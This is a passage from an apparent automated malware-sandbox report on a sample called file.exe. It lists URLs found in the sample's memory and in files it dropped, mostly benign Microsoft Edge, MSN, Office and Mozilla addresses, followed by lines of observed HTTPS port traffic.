Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_history_hc.png/0.1.3/asset
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_history_maximal_dark.png/0.1.3/asset
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_history_maximal_light.png/0.1.3/asset
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_iHeart.png/1.0.3/asset
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_image_creator_hc.png/1.0.14/asset
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_image_creator_maximal_dark.png/1.0.14/as
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_image_creator_maximal_light.png/1.0.14/a
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_instagram.png/1.4.13/asset
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_ku_gou.png/1.0.3/asset
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_last.png/1.0.3/asset
Source: 000003.log8.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_manifest_gz/4.7.107/asset?assetgroup=Sho
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_maximal_follow_dark.png/1.1.0/asset
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_maximal_follow_hc.png/1.1.0/asset
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_maximal_follow_light.png/1.1.0/asset
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_naver_vibe.png/1.0.3/asset
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_onenote_dark.png/1.4.9/asset
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_onenote_hc.png/1.4.9/asset
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_onenote_light.png/1.4.9/asset
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_outlook_dark.png/1.9.10/asset
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_outlook_hc.png/1.9.10/asset
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr, HubApps Icons.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_outlook_light.png/1.9.10/asset
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_performance_hc.png/1.1.0/asset
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_performance_maximal_dark.png/1.1.0/asset
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_performance_maximal_light.png/1.1.0/asse
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_power_point.png/1.7.32/asset
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_qq.png/1.0.3/asset
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_refresh_dark.png/1.1.12/asset
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_refresh_hc.png/1.1.12/asset
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_refresh_light.png/1.1.12/asset
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_rewards_hc.png/1.1.3/asset
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_rewards_maximal_dark.png/1.1.3/asset
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_rewards_maximal_light.png/1.1.3/asset
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_hc.png/1.3.6/asset
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_maximal_dark.png/1.3.6/asset
Source: HubApps Icons.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_maximal_light.png/1.3.6/asset
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_dark.png/1.1.12/asset
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_dark.png/1.4.0/asset
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_dark.png/1.5.13/asset
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_hc.png/1.1.12/asset
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_hc.png/1.4.0/asset
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_hc.png/1.5.13/asset
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_light.png/1.1.12/asset
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_light.png/1.4.0/asset
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_light.png/1.5.13/asset
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_hc.png/1.4.0/asset
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_maximal_dark.png/1.4.0/asset
Source: HubApps Icons.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_maximal_light.png/1.4.0/asset
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_skype_dark.png/1.3.20/asset
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_skype_hc.png/1.3.20/asset
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_skype_light.png/1.3.20/asset
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_sound_cloud.png/1.0.3/asset
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_spotify.png/1.4.12/asset
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_teams_dark.png/1.2.19/asset
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_teams_hc.png/1.2.19/asset
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_teams_light.png/1.2.19/asset
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_telegram.png/1.0.4/asset
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_theater_hc.png/1.0.5/asset
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_theater_maximal_dark.png/1.0.5/asset
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_theater_maximal_light.png/1.0.5/asset
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_tidal.png/1.0.3/asset
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_tik_tok_light.png/1.0.5/asset
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_toolbox_hc.png/1.5.13/asset
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_toolbox_maximal_dark.png/1.5.13/asset
Source: HubApps Icons.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_toolbox_maximal_light.png/1.5.13/asset
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_twitter_light.png/1.0.9/asset
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_vk.png/1.0.3/asset
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_whats_new.png/1.0.0/asset
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_whatsapp_light.png/1.4.11/asset
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_word.png/1.7.32/asset
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_yandex_music.png/1.0.10/asset
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_youtube.png/1.4.14/asset
Source: 000003.log8.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/signal_triggers/1.13.3/asset?sv=2017-07-29&sr=c&sig=Nt
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: https://excel.new?from=EdgeM365Shoreline
Source: chromecache_532.4.dr	String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/alert/v11/gm_grey200-36dp/2x/gm_alert_gm_grey200_3
Source: chromecache_532.4.dr	String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/alert/v11/gm_grey600-36dp/2x/gm_alert_gm_grey600_3
Source: chromecache_532.4.dr	String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/close/v19/gm_grey200-24dp/1x/gm_close_gm_grey200_2
Source: chromecache_532.4.dr	String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/close/v19/gm_grey600-24dp/1x/gm_close_gm_grey600_2
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: https://gaana.com/
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: https://i.y.qq.com/n2/m/index.html
Source: 2cc80dabc69f58b6_1.8.dr	String found in binary or memory: https://img-s-msn-com.akamaized.net/
Source: 2cc80dabc69f58b6_1.8.dr	String found in binary or memory: https://img-s.msn.cn/tenant/amp/entityid/
Source: EHJKFCGHIDHCBGDHJKEB.0.dr	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: https://latest.web.skype.com/?browsername=edge_canary_shoreline
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: https://m.kugou.com/
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: https://m.soundcloud.com/
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: https://m.vk.com/
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: https://mail.google.com/mail/mu/mp/266/#tl/Inbox
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: https://manifestdeliveryservice.edgebrowser.microsoft-staging-falcon.io/app/page-context-demo
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: https://mozilla.org0/
Source: Cookies.9.dr	String found in binary or memory: https://msn.comXID/
Source: Cookies.9.dr	String found in binary or memory: https://msn.comXIDv10
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: https://music.amazon.com
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: https://music.apple.com
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: https://music.yandex.com
Source: 2cc80dabc69f58b6_1.8.dr	String found in binary or memory: https://ntp.msn.cn/edge/ntp
Source: 000003.log6.8.dr, 2cc80dabc69f58b6_0.8.dr	String found in binary or memory: https://ntp.msn.com
Source: 000003.log.8.dr, 000003.log2.8.dr	String found in binary or memory: https://ntp.msn.com/
Source: 000003.log.8.dr	String found in binary or memory: https://ntp.msn.com/0
Source: QuotaManager.8.dr	String found in binary or memory: https://ntp.msn.com/_default
Source: 000003.log.8.dr, 2cc80dabc69f58b6_1.8.dr	String found in binary or memory: https://ntp.msn.com/edge/ntp
Source: 2cc80dabc69f58b6_1.8.dr	String found in binary or memory: https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=288
Source: Session_13377050732443437.8.dr	String found in binary or memory: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&start
Source: QuotaManager.8.dr	String found in binary or memory: https://ntp.msn.com/ntp.msn.com_default
Source: 2cc80dabc69f58b6_0.8.dr	String found in binary or memory: https://ntp.msn.comService-Worker-Allowed:
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: https://open.spotify.com
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: https://outlook.live.com/calendar/view/agenda/quickcapture/moreDetails?isExtension=true
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: https://outlook.live.com/mail/0/
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: https://outlook.live.com/mail/compose?isExtension=true
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: https://outlook.live.com/mail/inbox?isExtension=true&sharedHeader=1&nlp=1&client_flight=outlookedge
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: https://outlook.office.com/calendar/view/agenda/quickcapture/moreDetails?isExtension=true
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: https://outlook.office.com/mail/0/
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: https://outlook.office.com/mail/compose?isExtension=true
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: https://outlook.office.com/mail/inbox?isExtension=true&sharedHeader=1&client_flight=outlookedge
Source: chromecache_532.4.dr	String found in binary or memory: https://play.google.com/log?format=json&hasfast=true
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: https://powerpoint.new?from=EdgeM365Shoreline
Source: 2cc80dabc69f58b6_1.8.dr	String found in binary or memory: https://sb.scorecardresearch.com/
Source: 2cc80dabc69f58b6_1.8.dr	String found in binary or memory: https://srtb.msn.cn/
Source: 2cc80dabc69f58b6_1.8.dr	String found in binary or memory: https://srtb.msn.com/
Source: EBFBFBFIIJDAKECAKKJEHCFIJK.0.dr	String found in binary or memory: https://support.mozilla.org
Source: EBFBFBFIIJDAKECAKKJEHCFIJK.0.dr	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: EBFBFBFIIJDAKECAKKJEHCFIJK.0.dr	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.ZAnPVwXvBbYt
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: https://tidal.com/
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: https://twitter.com/
Source: edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.8.dr	String found in binary or memory: https://unitedstates1.ss.wd.microsoft.us/
Source: edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.8.dr	String found in binary or memory: https://unitedstates2.ss.wd.microsoft.us/
Source: edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.8.dr	String found in binary or memory: https://unitedstates4.ss.wd.microsoft.us/
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: https://vibe.naver.com/today
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: https://web.skype.com/?browsername=edge_canary_shoreline
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: https://web.skype.com/?browsername=edge_stable_shoreline
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: https://web.telegram.org/
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: https://web.whatsapp.com
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: https://word.new?from=EdgeM365Shoreline
Source: file.exe, 00000000.00000002.2744608109.0000000023724000.00000004.00000020.00020000.00000000.sdmp, EHJKFCGHIDHCBGDHJKEB.0.dr	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: https://www.deezer.com/
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: FHDAFIID.0.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: content_new.js.8.dr, content.js.8.dr	String found in binary or memory: https://www.google.com/chrome
Source: file.exe, 00000000.00000003.2457279124.00000000236CF000.00000004.00000020.00020000.00000000.sdmp, GHJDGDBF.0.dr, FHDAFIID.0.dr, Web Data.8.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: 235cc606-a233-4fce-9d1e-57c163d2a5e0.tmp.9.dr, e4cdfaac-96a9-4551-87b6-68e32893b181.tmp.9.dr	String found in binary or memory: https://www.googleapis.com
Source: chromecache_532.4.dr	String found in binary or memory: https://www.gstatic.com/gb/html/afbp.html
Source: chromecache_532.4.dr	String found in binary or memory: https://www.gstatic.com/images/icons/material/anim/mspin/mspin_googcolor_medium.css
Source: chromecache_532.4.dr	String found in binary or memory: https://www.gstatic.com/images/icons/material/anim/mspin/mspin_googcolor_small.css
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: https://www.iheart.com/podcast/
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: https://www.instagram.com
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: https://www.last.fm/
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: https://www.messenger.com
Source: EBFBFBFIIJDAKECAKKJEHCFIJK.0.dr	String found in binary or memory: https://www.mozilla.org
Source: EBFBFBFIIJDAKECAKKJEHCFIJK.0.dr	String found in binary or memory: https://www.mozilla.org#
Source: EBFBFBFIIJDAKECAKKJEHCFIJK.0.dr	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
Source: EBFBFBFIIJDAKECAKKJEHCFIJK.0.dr	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
Source: EBFBFBFIIJDAKECAKKJEHCFIJK.0.dr	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: 2cc80dabc69f58b6_1.8.dr	String found in binary or memory: https://www.msn.com/web-notification-icon-light.png
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: https://www.msn.com/widgets/fullpage/cgSideBar/widget?experiences=CasualGamesHub&sharedHeader=1
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: https://www.msn.com/widgets/fullpage/cgSideBar/widget?experiences=CasualGamesHub&sharedHeader=1&game
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: https://www.msn.com/widgets/fullpage/cgSideBar/widget?experiences=CasualGamesHub&sharedHeader=1&item
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: https://www.msn.com/widgets/fullpage/gaming/widget?experiences=CasualGamesHub&sharedHeader=1
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: https://www.msn.com/widgets/fullpage/gaming/widget?experiences=CasualGamesHub&sharedHeader=1&item=fl
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: https://www.msn.com/widgets/fullpage/gaming/widget?experiences=CasualGamesHub&sharedHeader=1&playInS
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: https://www.office.com
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: https://www.officeplus.cn/?sid=shoreline&endpoint=OPPC&source=OPCNshoreline
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: https://www.onenote.com/stickynotes?isEdgeHub=true
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: https://www.onenote.com/stickynotes?isEdgeHub=true&auth=1
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: https://www.onenote.com/stickynotes?isEdgeHub=true&auth=2
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: https://www.onenote.com/stickynotesstaging?isEdgeHub=true
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: https://www.onenote.com/stickynotesstaging?isEdgeHub=true&auth=1
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: https://www.onenote.com/stickynotesstaging?isEdgeHub=true&auth=2
Source: file.exe, 00000000.00000002.2744608109.0000000023724000.00000004.00000020.00020000.00000000.sdmp, EHJKFCGHIDHCBGDHJKEB.0.dr	String found in binary or memory: https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: https://www.tiktok.com/
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: https://www.youtube.com
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: https://y.music.163.com/m/

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49865
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49986
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 49817 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49864
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49985
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49863
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49984
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49862
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49983
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49861
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49982
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49860
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49981
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49980
Source: unknown	Network traffic detected: HTTP traffic on port 49932 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49898 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49875 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49852 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50131 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49990 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49859
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49979
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49857
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49978
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49856
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49977
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
